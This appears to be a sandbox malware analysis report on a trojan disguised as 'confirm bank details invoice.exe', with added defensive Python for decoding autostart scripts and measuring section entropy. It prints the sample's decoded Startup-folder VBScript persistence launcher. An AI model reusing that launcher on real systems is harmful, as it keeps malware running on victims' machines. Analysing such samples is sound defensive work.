                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:confirm bank details invoice.exe
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winEXE@10/6@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 57
                  • Number of non-executed functions: 298
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: confirm bank details invoice.exe
                  Time | Type | Description
                  06:19:28 | API Interceptor | 6x Sleep call for process: svchost.exe modified
                  12:19:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
                  No context
                  Process:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL
                  Process:C:\Users\user\Desktop\confirm bank details invoice.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL
                  Process:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL
                  Process:C:\Users\user\Desktop\confirm bank details invoice.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL
                  Process:C:\Users\user\Desktop\confirm bank details invoice.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1214464
                  Entropy (8bit):7.147575666685172
                  Encrypted:false
                  SSDEEP:24576:Ltb20pkaCqT5TBWgNQ7aw5d1UaOV9VOuO6YJ4xdO6A:IVg5tQ7awT1UasVOlk+5
                  MD5:AAC8FCCDEA2F379BB5C27EDF267427FD
                  SHA1:E193C96E5D20E5F296FC8BF84145BFDBE8CE1CFC
                  SHA-256:2FAACF34E9482CBF4D1B032AF7193B4C1ECD419DA8377D47E1A307F17B77BC27
                  SHA-512:E75A3C3807988DBF2DE5BF9FDF2787C91E2CB1190D3DB3FE1D857D611085F14271F830053B7EA0EC3A7F6160DEBD69EEBB501D385724B1CE3EA0E7A84C216AF2
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 34%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L...f.>g..........".................t_............@.................................c.....@...@.......@......................p..|....@..\....................@..Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc...\....@......................@..@.reloc..t....@......................@..B................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):278
                  Entropy (8bit):3.4091704201961828
                  Encrypted:false
                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1hDoMlIAnriIM8lfQVn:DsO+vNlzQ1WMlPmA2n
                  MD5:63C617383623F735E208DFC2E005C1AA
                  SHA1:339364CC799FE9863594EBAF38CCFB9008EF5854
                  SHA-256:44E6BDE15A8327E130E0B68D7615859CD5ECE68E51E4B50CB7AA2DBB1713C41B
                  SHA-512:F074A18E5EB9A85E41E57ABE5BC7C69E94BCC87B448EEE18A0BA308894EED8C4F798B4221BA3D7364C4EB060C003FFA58E6397BABBD2E780F1AF1CFDA95BE664
                  Malicious:true
                  Reputation:low
                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.V.e.v.i.n.a.\.d.e.b.l.a.t.e.r.a.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                  Preview decoded (the file is UTF-16LE; the dots above are its NUL bytes and line terminators):
                  Set WshShell = CreateObject("WScript.Shell")
                  WshShell.Run "C:\Users\alfons\AppData\Local\Vevina\deblaterate.exe", 1
                  Set WshShell = Nothing
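The 278-byte file above is the deblaterate.vbs that the timeline lists as an Autostart entry in the user's Startup folder: it does nothing but relaunch the dropped deblaterate.exe at every logon. The following is an added example, not code from the report or from the sample. It decodes a Windows Script Host file (UTF-16 with or without BOM, or ANSI), extracts the path handed to WshShell.Run, and flags an autostart script that launches an executable from a user-writable tree. The script bytes are reconstructed from the preview: the "alfons" user name is what the preview shows (the report's own paths use "user"), and LF line endings are an assumption, chosen because three lines of 139 characters in UTF-16LE give exactly the 278 bytes the report lists.

```python
"""Decode and triage a Startup-folder .vbs dropper such as deblaterate.vbs.
Added example (not Joe Sandbox or sample code); standard library only."""
import re
from pathlib import PureWindowsPath
from typing import Optional

# Reconstructed from the report's UTF-16LE preview: no BOM, LF line endings (assumption
# consistent with the listed size: 139 characters * 2 bytes = 278).
DEBLATERATE_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\alfons\\AppData\\Local\\Vevina\\deblaterate.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")

# Matches  obj.Run "target"  and  obj.Run("target", ...)
RUN_RE = re.compile(r'\.Run\s*\(?\s*"([^"]+)"', re.IGNORECASE)

# Path components a logon-time autostart should not be launching binaries from (assumption).
USER_WRITABLE = ("appdata", "temp", "public", "programdata")


def decode_script(raw: bytes) -> str:
    """WSH runs UTF-16 (BOM or not) and ANSI scripts; detect the UTF-16LE-without-BOM case
    by the NUL high bytes that ASCII text produces, then fall back to a byte-preserving decode."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def run_target(raw: bytes) -> Optional[str]:
    """Return the first path passed to WshShell.Run, or None if the script never calls Run."""
    m = RUN_RE.search(decode_script(raw))
    return m.group(1) if m else None


def is_suspicious_autostart(raw: bytes) -> bool:
    """True when the script launches an .exe that lives under a user-writable directory."""
    target = run_target(raw)
    if target is None:
        return False
    parts = [p.lower() for p in PureWindowsPath(target).parts]
    return target.lower().endswith(".exe") and any(p in USER_WRITABLE for p in parts)


if __name__ == "__main__":
    print(len(DEBLATERATE_VBS), "bytes ->", run_target(DEBLATERATE_VBS),
          "suspicious" if is_suspicious_autostart(DEBLATERATE_VBS) else "benign")
```

The check keys on where the launched binary lives rather than on the file name, so a renamed copy of the same dropper is still caught; a script that runs something out of System32 is left alone.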
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.147575666685172
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:confirm bank details invoice.exe
                  File size:1'214'464 bytes
                  MD5:aac8fccdea2f379bb5c27edf267427fd
                  SHA1:e193c96e5d20e5f296fc8bf84145bfdbe8ce1cfc
                  SHA256:2faacf34e9482cbf4d1b032af7193b4c1ecd419da8377d47e1a307f17b77bc27
                  SHA512:e75a3c3807988dbf2de5bf9fdf2787c91e2cb1190d3db3fe1d857d611085f14271f830053b7ea0ec3a7f6160debd69eebb501d385724b1ce3ea0e7a84c216af2
                  SSDEEP:24576:Ltb20pkaCqT5TBWgNQ7aw5d1UaOV9VOuO6YJ4xdO6A:IVg5tQ7awT1UasVOlk+5
                  TLSH:9145D01373DE8361C3725273BA26B741AEBF782506A1F56B2FD4093DF920122525EA73
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                  Icon Hash:aaf3e3e3938382a0
                  Entrypoint:0x425f74
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x673EC966 [Thu Nov 21 05:47:18 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:3d95adbf13bbe79dc24dccb401c12091
                  Instruction (disassembly at the entrypoint, 0x425f74)
                  call 00007F0A048C4DCFh
                  jmp 00007F0A048B7DE4h
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F0A048B7F6Ah
                  cmp edi, eax
                  jc 00007F0A048B82CEh
                  bt dword ptr [004C0158h], 01h
                  jnc 00007F0A048B7F69h
                  rep movsb
                  jmp 00007F0A048B827Ch
                  cmp ecx, 00000080h
                  jc 00007F0A048B8134h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F0A048B7F70h
                  bt dword ptr [004BA370h], 01h
                  jc 00007F0A048B8440h
                  bt dword ptr [004C0158h], 00000000h
                  jnc 00007F0A048B810Dh
                  test edi, 00000003h
                  jne 00007F0A048B811Eh
                  test esi, 00000003h
                  jne 00007F0A048B80FDh
                  bt edi, 02h
                  jnc 00007F0A048B7F6Fh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F0A048B7F73h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F0A048B7FC5h
                  bt esi, 03h
                  jnc 00007F0A048B8018h
                  movdqa xmm1, dqword ptr [esi+00h]
                  Programming Language:
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2012 UPD4 build 61030
                  • [RES] VS2012 UPD4 build 61030
                  • [LNK] VS2012 UPD4 build 61030
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5f65c | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x6c4c | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0xc4000 | 0x5f65c | 0x5f800 | 871e5a97bb35e875950ee4fca1d66204 | False | 0.930628272251309 | data | 7.901744471637124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0x124000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
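Entropy and ZLIB Complexity are the two columns that separate carrier from payload in this sample: .text, .rdata and .data compress like ordinary code and data, while .rsrc sits at 7.90 bits per byte with a 0.93 compression ratio, and the RT_RCDATA resource inside it (listed in the resource table that follows) has a ZLIB complexity of 1.0003, meaning zlib cannot shrink it at all. That profile is what an encrypted script blob inside a compiled-AutoIt stub looks like, which is consistent with the "likely a compiled AutoIt script" verdict. The following is an added example, not Joe Sandbox code: it reproduces both metrics per section by walking the IMAGE_SECTION_HEADER array with the standard library, and runs them on a constructed two-section image (not the sample) whose .rsrc is filled with random bytes. The 7.5 / 0.95 thresholds are triage assumptions, not values from the report.

```python
"""Per-section entropy and zlib-complexity triage, the two columns Joe Sandbox
reports in its section and resource tables.  Added example (not Joe Sandbox code)."""
import math
import os
import struct
import zlib
from typing import List, Tuple

ENTROPY_SUSPICIOUS = 7.5   # assumption: above this the bytes look encrypted or compressed
ZLIB_SUSPICIOUS = 0.95     # assumption: zlib gains nothing -> already compressed or encrypted


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) .. 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """len(compressed) / len(raw); values around 1.0 mean incompressible input."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def looks_packed(data: bytes) -> bool:
    return shannon_entropy(data) > ENTROPY_SUSPICIOUS and zlib_complexity(data) > ZLIB_SUSPICIOUS


_SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes


def pe_section_metrics(pe: bytes) -> List[Tuple[str, int, int, float, float]]:
    """Return (name, virtual_address, raw_size, entropy, zlib_complexity) per section,
    computed over each section's raw bytes exactly as the report's table does."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]       # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]          # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    off = e_lfanew + 4 + 20 + opt_size                                  # first section header
    rows = []
    for _ in range(num_sections):
        name, _vsize, vaddr, raw_size, raw_ptr, _r, _l, _nr, _nl, _chars = _SECTION_HDR.unpack_from(pe, off)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        rows.append((name.rstrip(b"\0").decode("ascii", "replace"), vaddr, raw_size,
                     round(shannon_entropy(raw), 3), round(zlib_complexity(raw), 3)))
        off += _SECTION_HDR.size
    return rows


def build_demo_pe() -> bytes:
    """Constructed two-section image for demonstration (NOT the report's sample): a
    repetitive .text and a .rsrc of os.urandom bytes standing in for an encrypted blob.
    Only the headers this parser reads are filled in; the optional header is omitted."""
    text = b"This program cannot be run in DOS mode.\r\n" * 16
    rsrc = os.urandom(4096)
    opt_size = 0
    hdr_end = 0x40 + 4 + 20 + opt_size + 2 * _SECTION_HDR.size
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    sec1 = _SECTION_HDR.pack(b".text", len(text), 0x1000, len(text), hdr_end, 0, 0, 0, 0, 0x60000020)
    sec2 = _SECTION_HDR.pack(b".rsrc", len(rsrc), 0x2000, len(rsrc), hdr_end + len(text), 0, 0, 0, 0, 0x40000040)
    return dos + b"PE\0\0" + file_hdr + sec1 + sec2 + text + rsrc


if __name__ == "__main__":
    for name, vaddr, size, ent, zc in pe_section_metrics(build_demo_pe()):
        print(f"{name:8} va=0x{vaddr:x} raw=0x{size:x} entropy={ent:.3f} zlib={zc:.3f}")
```

Run `pe_section_metrics(open(path, "rb").read())` on a real file to get the same four numbers per section; a section that trips both thresholds is where to look for the embedded payload before anything else.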
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                  RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                  RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                  RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                  RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                  RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                  RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                  RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                  RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                  RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                  RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
